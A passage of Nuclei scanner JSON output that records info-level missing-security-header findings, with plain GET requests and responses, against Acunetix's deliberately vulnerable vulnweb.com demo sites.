30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:20.918770505Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:21.489085033Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:21.489112632Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:21.631654323Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:21.631675965Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:21.631709077Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:21.631717772Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink 